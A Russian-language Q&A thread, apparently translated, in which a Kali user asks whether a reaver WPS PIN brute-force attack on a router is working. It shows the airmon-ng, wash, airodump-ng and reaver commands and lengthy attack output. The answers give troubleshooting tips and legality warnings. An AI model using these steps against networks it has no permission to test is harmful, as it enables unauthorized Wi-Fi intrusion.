Вопрос или проблема
Я новичок в Kali 2 и reaver и буду признателен, если кто-то с опытом проверит на основе приведенного ниже кода, работает ли он так, как должен. Когда я ввожу
airmon-ng start wlan0mon
и
wash -i wlan0mon
затем
airodump-ng wlan0mon
и наконец
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv
значит ли это, что reaver работает? Я знаю, что должен продолжать его запускать, но в прошлый раз, когда я это делал, он, по моему мнению, завис.
root@kali:~# reaver -i wlan0mon -b AC:EC:80:23:B1:50 -vv
Reaver v1.5.2 Инструмент атаки WiFi Protected Setup
Авторские права (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
модифицировано t6_x <[email protected]> & DataHead & Soxrok2212
[+] Ожидание сигнала от XX:EC:80:23:B1:50
[+] Переключение wlan0mon на канал 1
[+] Переключение wlan0mon на канал 2
[+] Переключение wlan0mon на канал 3
[+] Переключение wlan0mon на канал 4
[+] Переключение wlan0mon на канал 5
[+] Переключение wlan0mon на канал 6
[+] Переключение wlan0mon на канал 7
[+] Переключение wlan0mon на канал 8
[+] Переключение wlan0mon на канал 1
[+] Переключение wlan0mon на канал 9
[+] Переключение wlan0mon на канал 10
[+] Переключение wlan0mon на канал 11
[+] Переключение wlan0mon на канал 12
[+] Переключение wlan0mon на канал 13
[+] Переключение wlan0mon на канал 14
[+] Переключение wlan0mon на канал 1
[+] Переключение wlan0mon на канал 2
[+] Переключение wlan0mon на канал 3
[+] Переключение wlan0mon на канал 4
[+] Переключение wlan0mon на канал 5
[+] Переключение wlan0mon на канал 6
[+] Переключение wlan0mon на канал 7
[+] Переключение wlan0mon на канал 8
[+] Переключение wlan0mon на канал 9
[+] Перекключение wlan0mon на канал 1
[+] Переключение wlan0mon на канал 10
[+] Переключение wlan0mon на канал 11
[+] Переключение wlan0mon на канал 12
[+] Переключение wlan0mon на канал 13
[+] Переключение wlan0mon на канал 14
[+] Переключение wlan0mon на канал 1
[+] Переключение wlan0mon на канал 2
[+] Переключение wlan0mon на канал 3
[+] Переключение wlan0mon на канал 4
[+] Переключение wlan0mon на канал 5
[+] Переключение wlan0mon на канал 6
[+] Переключение wlan0mon на канал 7
[+] Переключение wlan0mon на канал 8
[+] Переключение wlan0mon на канал 9
[+] Переключение wlan0mon на канал 10
[+] Переключение wlan0mon на канал 1
[+] Подключение к AC:EC:80:23:B1:50 (ESSID: Name-2GH)
[+] Начало сеанса взлома. Количество PIN-кодов: 0, Максимальные попытки PIN-кода: 11000
[+] Пробую PIN 12345670.
[+] Отправка запроса EAPOL START
[+] Получен запрос на идентификацию
[+] Отправка ответа на идентификацию
[!] ВНИМАНИЕ: Произошло время ожидания получения
[+] Отправка WSC NACK
[!] Транзакция WPS не удалась (код: 0x02), повторная попытка последнего PIN-кода
[+] Пробую PIN 12345670.
[+] Переключение wlan0mon на канал 11
[+] Переключение wlan0mon на канал 12
[+] Переключение wlan0mon на канал 13
[+] Переключение wlan0mon на канал 14
[+] Переключение wlan0mon на канал 1
[+] Переключение wlan0mon на канал 2
[+] Переключение wlan0mon на канал 3
[+] Переключение wlan0mon на канал 1
[+] Переключение wlan0mon на канал 4
[+] Переключение wlan0mon на канал 5
[+] Переключение wlan0mon на канал 6
[+] Переключение wlan0mon на канал 7
[+] Переключение wlan0mon на канал 8
[+] Переключение wlan0mon на канал 9
[+] Переключение wlan0mon на канал 10
[+] Переключение wlan0mon на канал 11
[+] Переключение wlan0mon на канал 12
[+] Переключение wlan0mon на канал 1
[+] Отправка запроса EAPOL START
[+] Получен запрос на идентификацию
[+] Отправка ответа на идентификацию
[+] Получен запрос на идентификацию
[+] Отправка ответа на идентификацию
[P] E-Nonce: 1d:90:73:4d:03:b1:d2:27:ea:7d:ca:5d:7d:5e:6c:cd
[P] PKE: 81:20:d0:0b:d2:be:c7:cf:41:f8:3e:08:3a:17:2f:ee:44:65:9a:85:d9:5d:93:58:29:02:c2:fc:0d:cc:8f:e7:90:1b:0d:f9:02:76:50:89:83:d0:72:e8:87:f1:4d:12:38:81:15:87:e1:1f:e5:86:87:14:0d:6d:b9:91:84:96:93:66:2d:8f:96:f9:13:73:57:51:6b:c4:11:31:f2:e6:8b:1d:46:fe:28:46:1f:8a:fc:92:ea:b1:c8:8f:a3:d2:d9:71:d2:9a:3d:65:b3:d7:07:e8:20:f9:74:89:a8:d5:ff:e8:51:d5:d5:3d:3c:9f:2a:c6:db:4b:e9:78:a6:59:f5:3e:dc:17:9f:60:ae:f0:45:fb:94:de:a8:40:2c:34:db:38:62:1e:ba:76:4a:62:72:dd:1c:6f:37:c4:be:30:ad:a3:dc:d3:18:a9:c3:f1:74:aa:2b:b7:44:ad:b3:6d:a0:17:2f:bf:50:60:f4:f3:b9:22:f4:c2:fb:21:22:68
[P] WPS Производитель: Celeno Communication, Inc.
[P] WPS Название модели: Celeno Wireless AP 2.4G
[P] WPS Номер модели: CL1800
[P] Серийный номер точки доступа: 12345678
[+] Получено сообщение M1
[P] R-Nonce: cb:17:7f:a8:22:c2:15:29:77:0c:b1:97:7a:e9:fa:6e
[P] PKR: a3:a1:49:6f:39:b9:bc:5b:42:e4:e5:4b:d1:51:6a:93:91:dd:4a:32:91:22:42:a4:4f:60:b8:34:5a:42:20:82:a6:16:fc:c3:f9:1a:c6:44:9f:87:05:cf:f8:b4:cc:a1:4c:cb:3d:ba:ed:cb:31:a0:c4:89:63:18:f3:40:49:6d:91:3b:7b:50:66:d5:4c:96:95:87:0d:41:56:c3:ed:4e:fa:37:4c:30:d8:75:45:14:80:a7:4d:ca:82:84:0e:7d:7c:5a:47:39:11:05:da:42:15:54:b0:f5:63:f9:62:4e:55:9d:56:ca:8a:eb:40:25:4f:63:33:3c:ba:64:0b:d6:d6:3c:46:fb:c5:f2:08:60:67:e0:27:aa:62:b8:38:bf:20:a0:77:88:47:7f:09:40:08:3d:77:f5:2a:7b:e6:af:e7:b6:8a:1c:ee:46:52:1f:71:86:b1:1a:5d:c1:23:94:ec:76:91:cc:4a:15:64:2f:1e:66:13:98:53:d8:83:97
[P] AuthKey: 6c:08:fb:2a:de:90:1f:2f:6c:10:71:e5:9c:b1:39:2a:e4:f5:c3:5d:5b:b5:ea:07:8c:6a:3a:d2:45:bd:a4:d3
[+] Отправка сообщения M2
[+] Получено сообщение M1
[+] Отправка WSC NACK
[+] Отправка WSC NACK
[!] Транзакция WPS не удалась (код: 0x03), повторная попытка последнего PIN-кода
Я просто ищу подтверждение от кого-то с опытом. Работает ли здесь reaver? Мне нужно знать, прежде чем я дам этому работать еще день или около того.
Когда вы запускаете wash -i wlan0mon, будет список роутеров, которые подвержены reaver.
Показан ли роутер, против которого вы пытаетесь, в wash?
Если да, то какова его сильность?
Я сам заметил, что это происходит, когда я нахожусь вне диапазона своего роутера.
Если это ваш роутер, против которого вы это пробуете, попробуйте поставить его рядом с антенной, если нет, то получите разрешение или купите роутер, который подвержен этой атаке.
Нет, это просто переключение каналов для соответствия каналу WAP. Как только это произойдет, он будет постоянно пытаться аутентифицироваться через WPS, пока не добьется успеха. Это означает, что если у них отключен WPS, это не сработает. Вам, возможно, будет лучше использовать атаку со словарем.
Помните, что делать это можно только в вашей собственной тестовой сети для целей тестирования на проникновение. Возможно, это незаконно вмешиваться в Wi-Fi других людей в вашей юрисдикции.
Ответ или решение
Reaver – это мощный инструмент, используемый для атак на сети Wi-Fi с включенной функцией WPS (Wi-Fi Protected Setup). Рассмотрим, насколько правильно вы используете Reaver, и действительно ли он работает в вашем случае.
Состояние работы Reaver
На основании предоставленного вами вывода Reaver можно сделать следующие выводы:
-
Инициализация:
- Вы ввели команду
reaver -i wlan0mon -b AC:EC:80:23:B1:50 -vv, что правильно и необходимо для начала работы. Гдеwlan0monуказывает интерфейс в мониторе, а-bзадает MAC-адрес точки доступа, к которой вы подключаетесь.
- Вы ввели команду
-
Поиск и соединение:
- В выводе видно, что Reaver ждет передачи маяка от вашей точки доступа, а затем начинает переключаться между каналами. Это нормально, так как инструмент пытается поймать сигналы от точки доступа. Однако здесь есть важный момент:
Уязвимость WPS
Убедитесь, что раутер действительно поддерживает WPS и уязвим к атакам Reaver:
- Важно выполнить команду
wash -i wlan0monперед запуском Reaver, чтобы убедиться, что ваша точка доступа отображается в списке уязвимых маршрутизаторов. Если точка доступа не появляется в этом списке, это означает, что она не подвержена атаке через WPS, и попытка с помощью Reaver не увенчается успехом.
Процесс атаки
- После обнаружения точки доступа и начала сессии взлома, вы видите сообщения о попытках отправки EAPOL START запросов и получение ответов идентификации. Появление таких сообщений говорит о том, что Reaver пытается установить связь с WPS и отправляет пин-коды, но при этом возникают временные тайм-ауты, как указано в выводе с предупреждениями.
Обратная связь
- Ответы, которые содержат сообщения об ошибках, такие как "WPS transaction failed", указывают на то, что ваш роутер, возможно, не отвечает или не поддерживает WPS. Кроме того, такие ошибки обычно указывают на проблемы с соединением или низкое качество сигнала.
Рекомендации
-
Проверка сигнала:
- Убедитесь, что вы находитесь в пределах хорошего диапазона Wi-Fi относительно точки доступа. В случае низкого сигнала, попытки могут не привести к успеху.
-
Тестирование WPS:
- Убедитесь, что WPS действительно включен на вашем роутере. Если вы имеете физический доступ к устройству, временно его отключите и снова включите для проверки.
-
Необходимость легальности:
- Проверьте законы вашей страны, касающиеся использования таких инструментов. Атаковать чужие сети без разрешения незаконно.
Заключение
Подводя итог, Reaver требует устойчивого сигнала и доступности WPS на целевой сети для успешной эксплуатации. Сообщения о тайм-аутах и сбоях на этапе WPS подтверждают необходимость проверки настройки вашего маршрутизатора. Если вы видите сообщения о связи, это хороший знак того, что Reaver работает, но без подходящей уязвимости или с плохим сигналом шансы на успех будут низкими. Поэтому, если вы не видите успеха через некоторое время, стоит рассмотреть альтернативные методы взлома или физическую переоценку расположения вашего оборудования.